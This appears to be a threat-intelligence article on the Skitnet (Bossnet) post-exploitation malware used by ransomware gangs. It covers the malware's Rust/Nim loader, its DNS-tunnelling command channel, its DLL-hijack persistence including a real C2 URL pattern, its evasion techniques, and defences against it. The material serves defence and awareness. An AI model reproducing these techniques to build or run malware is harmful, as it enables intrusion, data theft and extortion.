Skitnet ("Bossnet") in 2025: Stealthy Malware Powering Sophisticated Ransomware Tactics

First ...Let's talk about it's Origin...

Emergence in the Cybercrime Ecosystem

Skitnet first appeared on underground forums like RAMP on April 19, 2024, marketed as a "compact package" that includes both the malware and a server-side control panel. Developed by a threat actor tracked as LARVA-306, Skitnet is designed for ease of use, featuring automated deployment via Bash scripts and anti-forensic capabilities that wipe logs, IP addresses, and command history. Its initial offering targeted cybercriminals seeking a versatile post-exploitation tool, but it wasn’t until early 2025 that Skitnet gained widespread adoption among ransomware gangs, as reported by Prodaft and other cybersecurity firms.

The malware’s rise coincides with a broader shift in the ransomware ecosystem, where law enforcement actions like Operation Endgame (May 2024) disrupted major botnets such as QakBot and IcedID. This created a demand for new tools that could fill the gap, and Skitnet’s affordability, modularity, and stealth features made it an attractive option. By April 2025, groups like Black Basta were observed using Skitnet in Microsoft Teams phishing campaigns targeting enterprise environments, while Cactus leveraged it for similar post-exploitation activities.

The Industrialization of Cybercrime

Skitnet’s availability on platforms like RAMP highlights the industrialization of cybercrime, where Malware-as-a-Service (MaaS) ecosystems democratize access to sophisticated tools. This allows less-skilled actors to deploy advanced attacks without deep technical expertise, amplifying the threat landscape. The malware’s rapid adoption in 2025 reflects a trend where ransomware gangs are increasingly relying on off-the-shelf solutions to streamline operations, reduce development costs, and complicate attribution.

How Skitnet Works: Infection Chain and Mechanisms

Skitnet operates as a multi-stage malware, leveraging a combination of programming languages, encryption, and stealth techniques to infiltrate systems, maintain persistence, and facilitate ransomware deployment. Below is a detailed breakdown of its infection chain and capabilities, based on analyses from Prodaft, The Hacker News, and other sources.

1. Initial Infection Vector: Phishing and Social Engineering

Skitnet is typically deployed after initial access has been gained, often through phishing campaigns or other social engineering tactics:

• Microsoft Teams Phishing: Black Basta has been observed using Teams-themed phishing attacks to target enterprises, tricking users into executing malicious payloads.

• Compromised Credentials: Attackers exploit stolen credentials or unpatched vulnerabilities in systems like Microsoft Exchange or VPNs to gain a foothold, then deploy Skitnet for post-exploitation.

• Third-Party Software: Skitnet may be delivered via compromised third-party software or remote monitoring tools, a tactic increasingly common in ransomware attacks (Huntress, 2025 Cyber Threat Report).

2. Delivery and Execution

Skitnet’s infection begins with a Rust-based loader, which initiates a multi-stage process designed to evade detection:

• Rust Loader: The initial executable, written in Rust, decrypts a ChaCha20-encrypted Nim binary and loads it directly into memory using reflective code loading (via the DInvoke-rs library). This in-memory execution avoids writing to the disk, reducing the likelihood of detection by traditional antivirus software.

• Nim Payload: The decrypted Nim binary establishes a DNS-based reverse shell for communication with the command-and-control (C2) server. It initiates contact using randomized DNS queries, which blend into legitimate network traffic.

• Multi-Threaded Operations: The Nim payload launches three threads:

  1. Heartbeat Thread: Sends periodic DNS requests to signal the malware’s presence.

  2. Output Tracking: Monitors and exfiltrates command output.

  3. Command Listener: Receives and decrypts commands from the C2 server via DNS responses.

3. Command-and-Control (C2) Communication

Skitnet uses a DNS-based C2 channel, a stealthy method that leverages DNS tunneling to communicate with its operators:

• DNS Tunneling: Commands and responses are encrypted (using symmetric encryption) and encapsulated within DNS requests, often as TXT records. This allows Skitnet to evade network monitoring tools that focus on HTTP/HTTPS traffic.

• Control Panel: Operators manage infected systems via a feature-rich C2 dashboard, which displays the target’s IP, location, and status. The panel supports a variety of commands, enabling remote control, data exfiltration, and payload delivery.

• Dynamic API Resolution: Skitnet resolves Windows API functions dynamically using GetProcAddress, avoiding traditional import tables that could trigger detection.

4. Persistence Mechanisms

Skitnet employs sophisticated persistence techniques to ensure long-term access:

• DLL Hijacking: Through the “startup” command, Skitnet downloads three files to C:\ProgramData\huo:

  1. ISP.exe: A legitimate, digitally signed executable from ASUSTeK Computer Inc.

  2. SnxHidLib.DLL: A malicious DLL that hijacks the execution flow when loaded by ISP.exe.

  3. pas.ps1: A PowerShell script that maintains C2 communication. The malware places a shortcut to ISP.exe in the Windows Startup folder, ensuring it runs on reboot. When ISP.exe loads, it calls LoadLibrary to import SnxHidLib.DLL, which executes pas.ps1. This script retrieves the C drive’s serial number and sends continuous requests to the C2 server (e.g., http://178.236.247.7/{serial_number}), awaiting further commands.

• PowerShell Automation: The pas.ps1 script uses Invoke-Expression to execute remote PowerShell commands, creating a resilient feedback loop for ongoing control.

5. Post-Exploitation Capabilities

Skitnet’s versatility makes it a powerful tool for ransomware gangs, supporting a range of post-exploitation activities:

• Screen Capture: The “screen” command captures a screenshot of the victim’s desktop using PowerShell, uploads it to Imgur, and sends the URL back to the C2 server.

• Remote Access: Skitnet stealthily installs legitimate remote access tools like AnyDesk and RUT-Serv, hiding their windows and notification tray icons to avoid detection.

• Data Exfiltration: The malware can steal sensitive data, such as intellectual property or customer information, which is often used in double extortion schemes (data theft followed by ransomware deployment).

• Antivirus Enumeration: Using WMI queries, Skitnet lists installed antivirus and endpoint protection software, providing attackers with insights into the victim’s defenses.

• Shell Access: The “shell” command opens a PowerShell loop, polling the C2 server every five seconds for new commands to execute via Invoke-Expression.

• Additional Payloads: A .NET-based loader can be deployed via an encoded PowerShell dropper, using base64, XOR, and RC4 encryption to fetch and execute further payloads, extending Skitnet’s capabilities.

Evasion and Anti-Analysis Techniques

Skitnet’s design prioritizes stealth, employing multiple techniques to evade detection and analysis:

1. Stealth Communication

• DNS Tunneling: By using DNS queries for C2 communication, Skitnet avoids traditional network monitoring focused on HTTP/HTTPS traffic. The use of randomized DNS queries and TXT records further obfuscates its activity.

• Encrypted Traffic: Commands and responses are symmetrically encrypted, making it difficult to intercept or analyze C2 communications.

2. Code Obfuscation

• Rust and Nim: The use of less common programming languages like Rust and Nim reduces detection rates, as many security tools are optimized for C/C++ or .NET-based threats.

• In-Memory Execution: The Nim payload is loaded directly into memory using reflective code loading, leaving minimal forensic traces on the disk.

• Obfuscated Strings: Skitnet employs string encryption and opaque predicates to hinder static analysis.

3. Anti-Forensic Measures

• Log Wiping: The server component automatically wipes SSH logs, IP addresses, command history, and cache data, thwarting forensic investigations.

• Dynamic API Handling: By resolving API functions at runtime, Skitnet avoids creating recognizable signatures in its import tables.

4. Living-Off-the-Land Techniques

• Legitimate Tools: Skitnet abuses legitimate software like AnyDesk, RUT-Serv, and ASUS executables to blend into the system, reducing the likelihood of detection.

• PowerShell Usage: The reliance on PowerShell for persistence and command execution leverages built-in Windows tools, aligning with the “living-off-the-land” trend observed in 75% of ransomware incidents in 2024 (Huntress, 2025 Cyber Threat Report).

Statistical Impact and Trends

Adoption and Scale

• Timeline: First advertised on April 19, 2024, Skitnet saw significant adoption by ransomware gangs in early 2025, with notable campaigns observed by April 2025.

• Key Actors: Groups like Black Basta and Cactus have deployed Skitnet in real-world attacks, particularly targeting enterprise environments.

• Distribution: Skitnet is sold on underground forums like RAMP, making it accessible to a wide range of threat actors, from established gangs to smaller operators.

Trends in Ransomware Tactics

• Rise in Post-Exploitation Tools: Skitnet’s adoption reflects a shift toward more sophisticated post-exploitation strategies, where ransomware gangs prioritize stealth, data theft, and persistence over immediate encryption.

• Double Extortion: Skitnet facilitates double extortion by enabling data exfiltration before ransomware deployment, increasing pressure on victims to pay.

• Use of Legitimate Tools: The malware’s reliance on tools like AnyDesk and PowerShell aligns with a broader trend where 17.3% of ransomware attacks in 2024 abused remote monitoring tools (Huntress, 2025 Cyber Threat Report).

• Evasion of EDR: Skitnet’s design counters endpoint detection and response (EDR) solutions, a growing challenge as threat actors adapt to improved enterprise defenses.

Impact

• Data Breaches: Skitnet’s ability to exfiltrate sensitive data poses risks of intellectual property theft, customer data leaks, and reputational damage.

• Operational Disruption: By enabling ransomware deployment, Skitnet causes significant downtime, with the average cost of ransomware recovery reaching millions in 2025.

• Repeated Exploitation: Its persistence mechanisms allow attackers to return for future attacks, even after ransom payment.

Let's Go Further In-Depth

Technical Sophistication

Skitnet’s multi-language architecture (Rust, Nim, .NET, PowerShell) and modular design make it a highly adaptable tool. The use of ChaCha20 encryption and DNS tunneling for C2 communication demonstrates a focus on evading traditional security measures, while its in-memory execution and reflective loading techniques minimize its digital footprint. The malware’s ability to dynamically resolve API functions and obfuscate strings further complicates analysis, making it a formidable challenge for defenders.

Role in Ransomware Operations

Skitnet plays a critical role in the double extortion paradigm, where ransomware gangs steal data before encrypting systems, using the threat of public disclosure to coerce payment. Its capabilities—data exfiltration, remote access, and persistence—enable attackers to maintain long-term control over compromised networks, facilitating lateral movement, privilege escalation, and strategic deployment of ransomware payloads. The use of legitimate tools like AnyDesk and RUT-Serv aligns with the “living-off-the-land” approach, allowing attackers to operate under the radar.

Comparison to Other Malware

Compared to other post-exploitation tools like TransferLoader (active since February 2025), which delivers the Morpheus ransomware using a three-component architecture, Skitnet stands out for its DNS-based communication and anti-forensic features. While TransferLoader uses the InterPlanetary File System (IPFS) as a fallback C2 channel, Skitnet’s reliance on DNS tunneling is more evasive, as DNS traffic is often overlooked by security tools. Additionally, Skitnet’s accessibility on underground forums contrasts with custom-built malware, making it a more democratized threat.

Attribution and Motives

While Skitnet is attributed to LARVA-306, its widespread availability on forums like RAMP complicates attribution, as multiple groups, including Black Basta and Cactus, have adopted it. The primary motive appears to be financial gain, as Skitnet enables double extortion and maximizes ransom payouts. However, its persistence capabilities suggest potential for espionage or future monetization, particularly in high-value targets like enterprises.

Mitigation Strategies

Defending against Skitnet requires a multi-layered approach that addresses its stealth, persistence, and post-exploitation capabilities:

1. Technical Defenses

• DNS Traffic Monitoring: Monitor for unusual DNS queries, such as frequent TXT records or non-standard requests, which may indicate Skitnet’s C2 communication.

• Endpoint Detection and Response (EDR): Deploy EDR solutions with behavior-based analytics to detect suspicious activities like Rust/Nim payloads, PowerShell usage, and DLL hijacking.

• PowerShell Restrictions: Limit PowerShell execution privileges to prevent unauthorized script execution, and enable command-line logging and auditing.

• Network Segmentation: Limit east-west traffic within networks to prevent lateral movement by Skitnet.

• Patch Management: Regularly patch vulnerabilities in Microsoft Exchange, VPNs, RDP services, and third-party software to prevent initial access.

2. User Education

• Phishing Awareness: Train employees to recognize phishing attempts, particularly those impersonating Microsoft Teams or other enterprise tools.

• Third-Party Software Risks: Educate users to download software only from official sources and verify the legitimacy of remote access tools like AnyDesk.

3. Proactive Measures

• Threat Intelligence: Leverage threat intelligence feeds to stay updated on Skitnet’s indicators of compromise (IoCs), such as those published by Prodaft on GitHub.

• Behavior-Based Detection: Focus on detecting abnormal behaviors, such as Invoke-Expression usage, scheduled tasks, or WMI events triggering remote scripts.

• Zero Trust Architecture: Enforce strict identity verification and least-privilege access to reduce the impact of breaches.

4. Incident Response

• Isolate Infected Systems: If Skitnet is detected, immediately isolate the affected system to prevent further communication with the C2 server.

• Analyze Persistence: Check the Windows Startup folder and C:\ProgramData\huo for malicious files, and terminate the pas.ps1 script loop.

• Recover Systems: Use offline backups to restore systems, as Skitnet does not encrypt files but facilitates ransomware deployment.

Skitnet, also known as Bossnet, represents a significant evolution in ransomware tactics in 2025, enabling stealthy post-exploitation activities that challenge traditional cybersecurity defenses. Its multi-stage architecture, DNS-based communication, and use of legitimate tools make it a versatile and evasive threat, while its availability on underground forums amplifies its reach. As ransomware gangs like Black Basta and Cactus continue to adopt Skitnet, organizations must adapt by implementing advanced detection, monitoring, and response strategies. By understanding Skitnet’s mechanisms and staying proactive, businesses can mitigate the risks posed by this sophisticated malware and safeguard their digital environments against the rising tide of cybercrime.